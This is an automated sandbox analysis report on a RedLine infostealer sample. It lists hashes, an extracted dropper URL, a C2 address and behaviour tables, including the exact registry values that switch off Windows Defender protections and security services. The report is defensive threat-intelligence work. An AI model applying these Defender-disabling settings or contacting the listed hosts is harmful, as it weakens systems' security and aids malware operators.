redline | 69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
09-06-2022 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aad0024d7c30bf6fee7c90d90371ca14.exe
Size

37.0MB
MD5

aad0024d7c30bf6fee7c90d90371ca14
SHA1

a503d2586a3eab062b1696fc1602bae9faaeb221
SHA256

69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07
SHA512

b8aa5a82c7b3366bc93dee6bfffbb6d5e6fefeff12d8073f8a86993e0a4c985fd88dd33ef87b89384cd094dc34444fc505bfcb3b90cc647bd01088692c3f970a

Score

10^/10

redline main discovery evasion infostealer spyware trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://thddghdd3.com/hfile.bin

Extracted

Family

redline

Botnet

Main

185.250.148.104:23290

Attributes

auth_value
128a196090d81c16477a2ef82c42859f

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4976-319-0x0000000000B80000-0x0000000000BA0000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 32 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 4176 created 2608	4176	svchost.exe	kernel32.exe
PID 4176 created 4568	4176	svchost.exe	kernel32.exe
PID 4176 created 832	4176	svchost.exe	kernel32.exe
PID 4176 created 3496	4176	svchost.exe	kernel32.exe
PID 4176 created 3652	4176	svchost.exe	kernel32.exe
PID 4176 created 1256	4176	svchost.exe	kernel32.exe
PID 4176 created 5112	4176	svchost.exe	kernel32.exe
PID 4176 created 1312	4176	svchost.exe	kernel32.exe
PID 4176 created 4740	4176	svchost.exe	kernel32.exe
PID 4176 created 5020	4176	svchost.exe	DllHost.exe
PID 4176 created 4480	4176	svchost.exe	kernel32.exe
PID 4176 created 3476	4176	svchost.exe	kernel32.exe
PID 4176 created 3604	4176	svchost.exe	kernel32.exe
PID 4176 created 2044	4176	svchost.exe	kernel32.exe
PID 4176 created 2088	4176	svchost.exe	kernel32.exe
PID 4176 created 3372	4176	svchost.exe	kernel32.exe
PID 4176 created 4704	4176	svchost.exe	kernel32.exe
PID 4176 created 4572	4176	svchost.exe	kernel32.exe
PID 4176 created 832	4176	svchost.exe	kernel32.exe
PID 4176 created 4160	4176	svchost.exe	kernel32.exe
PID 4176 created 1144	4176	svchost.exe	kernel32.exe
PID 4176 created 892	4176	svchost.exe	kernel32.exe
PID 4176 created 3980	4176	svchost.exe	kernel32.exe
PID 4176 created 3096	4176	svchost.exe	kernel32.exe
PID 4176 created 2628	4176	svchost.exe	kernel32.exe
PID 4176 created 2564	4176	svchost.exe	kernel32.exe
PID 4176 created 228	4176	svchost.exe	kernel32.exe
PID 4176 created 2620	4176	svchost.exe	kernel32.exe
PID 4176 created 2036	4176	svchost.exe	kernel32.exe
PID 4176 created 1708	4176	svchost.exe	kernel32.exe
PID 4176 created 4348	4176	svchost.exe	kernel32.exe
PID 4176 created 3196	4176	svchost.exe	kernel32.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

16 3772 powershell.exe
Downloads MZ/PE file

flow	pid	process
16	3772	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmp7za.exeWise Care 365 5.9.1.582.exekernel32.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.exeConhost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exekernel32.exeDllHost.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exeConhost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeielowutil.execmpbksrvc32.exe

pid	process
2944	aad0024d7c30bf6fee7c90d90371ca14.tmp
320	7za.exe
3436	Wise Care 365 5.9.1.582.exe
2608	kernel32.exe
4780	Wise Care 365 5.9.1.582.tmp
4568	kernel32.exe
832	kernel32.exe
4864	Conhost.exe
3496	kernel32.exe
3652	kernel32.exe
3548	kernel32.exe
1256	kernel32.exe
5112	kernel32.exe
3992	PING.EXE
1312	kernel32.exe
4740	kernel32.exe
2148	kernel32.exe
5020	DllHost.exe
4480	kernel32.exe
3324	kernel32.exe
3476	kernel32.exe
3604	kernel32.exe
1884	reg.exe
2044	kernel32.exe
2088	kernel32.exe
3528	reg.exe
3372	kernel32.exe
4704	kernel32.exe
4272	kernel32.exe
4572	kernel32.exe
832	kernel32.exe
3432	Conhost.exe
4160	kernel32.exe
1144	kernel32.exe
3548	kernel32.exe
892	kernel32.exe
3980	kernel32.exe
3428	kernel32.exe
3096	kernel32.exe
2628	kernel32.exe
2012	PING.EXE
2564	kernel32.exe
228	kernel32.exe
4388	kernel32.exe
2036	kernel32.exe
2620	kernel32.exe
1708	kernel32.exe
2088	kernel32.exe
4348	kernel32.exe
2136	PING.EXE
3196	kernel32.exe
1844	kernel32.exe
2040	7za.exe
644	7za.exe
1728	7za.exe
5116	7za.exe
4876	7za.exe
2596	7za.exe
5040	7za.exe
2100	7za.exe
1480	7za.exe
2128	7za.exe
3980	ielowutil.exe
2476	cmpbksrvc32.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx
behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exenvdrivesllapi.exeaad0024d7c30bf6fee7c90d90371ca14.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	nvdrivesllapi.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	aad0024d7c30bf6fee7c90d90371ca14.tmp

Loads dropped DLL 5 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmpWise Care 365 5.9.1.582.tmp

pid	process
2944	aad0024d7c30bf6fee7c90d90371ca14.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

2620 icacls.exe
2332 icacls.exe
3240 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2620	icacls.exe
2332	icacls.exe
3240	icacls.exe

AutoIT Executable 8 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe
behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ielowutil.exe

description pid process target process

PID 3980 set thread context of 4976 3980 ielowutil.exe csc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3552 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1896 timeout.exe
3036 timeout.exe
456 timeout.exe
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

2268 bitsadmin.exe
640 bitsadmin.exe

description	pid	process	target process
PID 3980 set thread context of 4976	3980	ielowutil.exe	csc.exe

pid	process
3552	schtasks.exe

pid	process
1896	timeout.exe
3036	timeout.exe
456	timeout.exe

pid	process
2268	bitsadmin.exe
640	bitsadmin.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

kernel32.exereg.exereg.exePING.EXEkernel32.exePING.EXEkernel32.exekernel32.exekernel32.exekernel32.exeConhost.exePING.EXEkernel32.exekernel32.exeConhost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PING.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PING.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PING.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PING.EXE

Modifies registry class 2 IoCs

Processes:

explorer.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2616	PING.EXE
4156	PING.EXE
216	PING.EXE
3224	PING.EXE
2676	PING.EXE
4740	PING.EXE
4156	PING.EXE
2464	PING.EXE
3240	PING.EXE
4412	PING.EXE
2608	PING.EXE
3992	PING.EXE
1776	PING.EXE
3936	PING.EXE
4148	PING.EXE
1656	PING.EXE
3088	PING.EXE
2372	PING.EXE
1384	PING.EXE
2568	PING.EXE
5004	PING.EXE
1552	PING.EXE
4952	PING.EXE
2556	PING.EXE
2832	PING.EXE
2136	PING.EXE
5080	PING.EXE
2212	PING.EXE
2980	PING.EXE
1652	PING.EXE
1500	PING.EXE
4876	PING.EXE
2004	PING.EXE
3552	PING.EXE
3708	PING.EXE
3536	PING.EXE
456	PING.EXE
2100	PING.EXE
3992	PING.EXE
876	PING.EXE
2260	PING.EXE
5016	PING.EXE
4944	PING.EXE
4640	PING.EXE
2604	PING.EXE
4204	PING.EXE
2532	PING.EXE
5024	PING.EXE
4208	PING.EXE
3384	PING.EXE
4372	PING.EXE
2832	PING.EXE
4532	PING.EXE
4208	PING.EXE
3384	PING.EXE
4444	PING.EXE
2100	PING.EXE
4260	PING.EXE
2012	PING.EXE
3284	PING.EXE
2332	PING.EXE
644	PING.EXE
4228	PING.EXE
4592	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmppowershell.exekernel32.exekernel32.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.exe

pid	process
2944	aad0024d7c30bf6fee7c90d90371ca14.tmp
2944	aad0024d7c30bf6fee7c90d90371ca14.tmp
3772	powershell.exe
3772	powershell.exe
2608	kernel32.exe
2608	kernel32.exe
2608	kernel32.exe
2608	kernel32.exe
4568	kernel32.exe
4568	kernel32.exe
4568	kernel32.exe
4568	kernel32.exe
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
832	kernel32.exe
832	kernel32.exe
832	kernel32.exe
832	kernel32.exe
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
3496	kernel32.exe
3496	kernel32.exe
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
3496	kernel32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exekernel32.exesvchost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exeDllHost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

description	pid	process
Token: SeDebugPrivilege	3772	powershell.exe
